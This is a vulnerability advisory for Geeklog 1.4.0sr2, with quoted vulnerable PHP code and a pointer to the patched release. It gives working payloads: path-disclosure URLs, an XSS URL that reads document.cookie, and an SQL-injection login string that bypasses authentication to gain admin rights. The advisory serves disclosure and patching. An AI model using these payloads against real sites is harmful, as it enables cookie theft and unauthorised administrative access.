KAPDA New advisory Vendor: http://www.geeklog.net Bugs: Path Disclosure, XSS, SQL Injection (Authentication bypass) Vulnerable Version: geeklog-1.4.0sr2(prior versions also may be affected) Exploitation: Remote with browser Description: -------------------- geeklog is a freely available PHP-based web content management system that uses a MySQL database. Vulnerabilities: -------------------- -->>Path Disclosure<<-- Reason: direct access to special files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/geeklog/layout/professional/functions.php http://example.com/geeklog/getimage.php?mode=show&image=dd -->>XSS<<-- Reason: the script doesn't properly validate user supplied input in getimage.php that result in xss vulnerability Example: http://example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)> Code Snippets: /getimage.php line#100-103 $display = COM_errorLog('File, ' . $downloader->getPath() . $image . ', was not found in getimage.php'); if ($mode == 'show') { echo COM_siteHeader ('menu') . $display . COM_siteFooter (); -->>SQL Injection (Authentication bypass)<<-- Reason: again the script doesn't properly validate user supplied input in /admin/auth.inc.php that may result in Authentication bypass using sql injection to gain admin privileges. Code Snippets: /admin/auth.inc.php line#44-45 if (!empty ($_POST['loginname']) && !empty ($_POST['passwd'])) { $status = SEC_authenticate ($_POST['loginname'], $_POST['passwd'], $uid); ../system/lib-security.php line#697-732 function SEC_authenticate($username, $password, &$uid) { global $_TABLES, $LANG01, $_CONF; $result = DB_query( "SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))" ); $tmp = mysql_errno(); $nrows = DB_numRows( $result ); if(( $tmp == 0 ) && ( $nrows == 1 )) { $U = DB_fetchArray( $result ); $uid = $U['uid']; if ($U['status'] == USER_ACCOUNT_DISABLED) { return USER_ACCOUNT_DISABLED; // banned, jump to here to save an md5 calc. } elseif ($U['passwd'] != md5( $password )) { return -1; // failed login } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) { //awaiting approval, jump to msg. echo COM_refresh($_CONF['site_url'] . '/users.php?msg=70'); exit; } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) { // Awaiting user activation, activate: DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username); return USER_ACCOUNT_ACTIVE; } else { return $U['status']; // just return their status } } else { $tmp = $LANG01[32] . ": '" . $username . "'"; COM_errorLog( $tmp, 1 ); return -1; } } as you see there is no input validation here so when magic_quotes_gpc=off you can bypass login Authentication. Example: /admin/moderation.php POST data: loginname: me' union select 3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from gl_users where username='Admin passwd: 22222 Solution: -------------------- Version geeklog-1.4.0sr3 is available now. http://www.geeklog.net/article.php/geeklog-1.4.0sr3 Original Advisory: -------------------- http://kapda.ir/advisory-336.html Credit: -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]